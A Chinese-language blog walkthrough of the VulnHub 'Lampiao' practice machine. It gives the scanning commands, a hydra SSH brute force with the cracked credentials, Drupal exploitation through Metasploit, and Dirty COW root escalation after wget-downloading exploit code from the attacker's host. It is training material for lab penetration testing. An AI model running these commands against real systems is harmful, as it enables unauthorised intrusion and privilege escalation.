Lampiao

最新推荐文章于 2024-01-16 10:41:31 发布
最新推荐文章于 2024-01-16 10:41:31 发布
阅读量750 收藏 1
点赞数
分类专栏: 靶机学习 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45821131/article/details/125245308
版权

信息收集

arp-scan -l

namp 192.168.19.0/24

nmap -p- 192.168.19.144

访问80端口,没有任何信息

访问1898端口,发现了一个登录页面

爆破一下目录

dirb 192.168.19.144:1898

获得url:http://192.168.19.144:1898/robots.txt

robots.txt文件在很多网站都有,里面会有一些泄露信息,可以多关注

发现文件http://192.168.19.144:1898/CHANGELOG.txt

cms框架为Drupal 7.54, 2017-02-01

没发现什么有用的信息,回到登录页面,点点看看有没有别的信息,点击标题时发现url上面有页数,输入别的数字尝试一下。

输入2,发现一个音频和一个图片

音频用google可以打开,提示一个人名tiago

图片扫码得到提示尝试用hydra爆破

使用博客类密码字典生成工具cewl(通过爬取网站关键信息创建一个密码字典)

cewl http://192.168.19.144:1898/?q=node/1 -w lampiao.txt

第一种拿shell

根据之前开放的端口有22端口

使用hydra进行爆破

hydra -l tiago -P lampiao.txt 192.168.19.144 ssh

账号tiago  密码Virgulino

ssh tiago@192.168.19.144

连接到ssh服务,获取一个低权限用户

第二种拿shell

根据之前发现版本drupal

打开msf

msfconsole

search drupal

use 1  用2018-03-28那个

show options 查看里面所需要设置的参数

set rport 1898

set rhosts 192.168.19.144

exploit

shell

脏牛提权

search dirty

找到40847.c文件

开启一个简易的python服务,用刚才获取的shell来下载40847.c文件

wget http://192.168.19.147:8081/40847.cpp

编译一下

g++ -Wall -pedantic -O2 -std=c++11 -pthread -o lampiao 40847.cpp -lutil

-Wall 一般使用该选项,允许发出GCC能够提供的所有有用的警告

-pedantic 允许发出ANSI/ISO C标准所列出的所有警告

-O2编译器的优化选项的4个级别,-O0表示没有优化,-O1为缺省值,-O3优化级别最高

-std=c++11就是用按C++2011标准来编译的

-pthread 在Linux中要用到多线程时,需要链接pthread库

-o lampiao gcc生成的目标文件,名字为lampiao

执行gcc编译可执行文件,可直接提权。

无人问津的椰子
关注
专栏目录
靶场练习之Lampiao
qq_52360932的博客
02-28 6058
Lampiao靶场练习
Lampiao 靶机练习
SYJ_361的博客
02-28 4727
利用kali对靶机进行扫描,远程登录靶机,并对靶机进行提权,找到靶机里面的文件
靶机:Lampiao
AzVoidSUN的博客
07-06 748
下载地址 https://www.vulnhub.com/entry/lampiao-1,249/ 选择NAT模式或桥接模式都可以 目标 得到root权限 信息收集 kali的ip是192.168.174.129 扫下c段 发现靶机ip 192.168.174.4 开启了 22 80端口 进入80端口看下 然后查看页面源代码 没有发现东西 dirb扫下目录 发现扫不到东西 ...
Lampiao靶场
b1n的博客
08-26 160
(2)后面是yes的是我们需要填的,这里只需要填写rhosts和rport,填写完后查看没问题直接run启动,可以看到成功连接靶机。2、百度网盘链接:https://pan.baidu.com/s/1bf46UgmyXKoussgLFW_-jg?-O2 编译器的优化选项的4个级别,-O0表示没有优化,-O1为缺省值,-O3优化级别最高。(4)进入的是一个伪终端,因此还要将其转换为真终端,执行下面的命令就将其变成了真终端。-T4:指定扫描过程中使用的时序(分为0-5等级,推荐用4)
lampiao-开源
05-03
Lampiao是一种具有两个模块的软件:代理和服务器。 代理获取硬件/软件/网络信息,并将简历发送到服务器。
Lampiao.zip
06-22
在这个"Lampiao.zip"压缩包中,我们可以看到几个与渗透测试相关的文件,包括"Lampiao.mf"、"Lampiao.ovf"和"Lampiao-disk1.vmdk"。 "Lampiao.mf"可能是一个Manifest文件,通常在Java或Android应用中用于记录组件和...
Vulnhub-Lampiao 靶机渗透
Majula
01-30 2249
WalkthroughDownloadDescriptionPen TestingInformation GatheringExploitationReview Download Lampião: 1 ~ VulnHub VM 镜像文件,直接选择 打开虚拟机 即可。 Description Would you like to keep hacking in your own lab? Try this brand new vulnerable machine! “Lampião 1”. Get root!
Lampiao(dirtycow)脏牛漏洞复现
weixin_34075268的博客
06-13 717
nmap扫描内网80端口发现目标主机 nmap -sP -p 80 192.168.31.0/24 扫描发现目标主机开放22端口、并且 1898端口开放http服务 御剑扫描目录并访问之后发现存在目录遍历漏洞 且部分文件可以下载 下载后浏览发现cms版本 寻找i相关漏洞...
渗透项目(二):Lampiao
Ays.Ie的博客
10-16 1203
2022.10.16更新第二个渗透项目Lampiao,步骤很详细,继续努力!
【靶机实战记录--lampiao
最新发布
qq_74240553的博客
01-16 1551
脏牛漏洞提权,vulnhub靶场
[Vulnhub] Lampiao
weixin_63231007的博客
07-03 623
下载链接:Lampião: 1 ~ VulnHub nmap 扫描一下 发现靶机ip:192.168.236.134nmap -A -p 1-65535 192.168.236.134扫一下靶机ip,看看开放了哪些服务: 访问80,没有信息,试试这个1898发现一个登录框,类似于博客 dirb 扫描一下目录 dirb http://192.168.236.134:1898 访问其中的,发现了是Drupal msf--Drupal漏洞利用 msfconsole 查找一下msf中Drupal可以利用的漏洞
简单靶机 Lampiao 笔记
2301_79118231的博客
09-19 322
准备:kali 、 Lampiao靶机kali 靶机设置为同一网段。
T_lampiao靶机
Finch_Alan的博客
02-08 960
d
VulnHub系列之Lampiao渗透测试
Flynn的博客
04-26 476
Lampiao 靶机下载:https://www.vulnhub.com/entry/lampiao-1,249/ 您想继续在自己的实验室中进行黑客攻击吗? 试试这个全新的易受攻击的机器!“兰皮奥 1”。
Lampiao靶机渗透测试
Huangshanyoumu的博客
04-19 1253
一、信息收集 1.主机发现 arp-scan -l 2.端口扫描 nmap -A -p- 192.168.1.120 发现开启了 22 ssh 服务 80、1898 web 服务,drupal7 框架 二、漏洞挖掘 1.查看对方web服务 访问 80 端口: 访问 1898 发现 drupal 框架 发现点击两个 Read more 会跳转到 ?q=node/1 和 ?q=node/3 ,没有 2,尝试访问 node2 发现有两个文件,尝试访问 发现 audio.m4a 是一段音频,内
《Vulnhub通关手册》——02 Lampiao
weixin_53801131的博客
12-08 1537
Vulnhub通关手册——02 Lampiao 背景概述: 下载地址为:https://www.vulnhub.com/entry/lampiao-1,249/ 本次的靶机ip为192.168.2.230 1. 信息收集 1.1 扫描目标主机IP 使用nmap进行活跃主机发现,使用命令nmap -sP 192.168.2.0/24,扫描结果如下。 └─$ sudo nmap -sP 192.168.2.0/24 Starting Nmap 7.91 ( https://nmap.org ) at 202
2-vulnhub Lampiao实战
weixin_45345568的博客
04-16 362
2-vulnhub Lampiao实战 简介: 下载地址为:https://www.vulnhub.com/entry/lampiao-1,249/ 本次的靶机ip为192.168.3.13(桥接模式自动获取) 一、信息搜集 1.扫描ip 2.扫描端口这里使用nmap进行: (开始只扫描出来80和22未果,后来反应过来,有可能网站还有其它端口可以访问,因为-sS参数是扫描常用的1000以内的端口号。于是用-p-参数:nmap -p- 192.168.3.13) 这里有三个端口先访问网站,发现如下是
渗透测试:Lampiao
weixin_55638067的博客
04-07 508
环境信息 攻击机IP:192.168.56.129 靶机IP:192.168.56.128 信息收集 nmap -sS -A -p- -n 192.168.56.128 全端口扫描 发现靶机开发了80端口 访问该网页后发现并没有什么有用的信息,接着访问1898端口 发现一个静态页面,在这页面可以访问两个页面 细心点可以发现两个页面分别是node/1和node/3,那我们来尝试访问node/2页面 终于发现有用的信息,一个音频文件,一个图片文件 音频文件得到信息u
lampiao靶机安装
07-27
为了安装Lampiao靶机,您可以按照以下步骤进行操作: 1. 首先,您需要准备一个基于Linux的操作系统,比如Ubuntu或者Kali Linux。 2. 在您选择的操作系统上安装Apache服务器、MySQL数据库和PHP解释器,这就是所谓的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值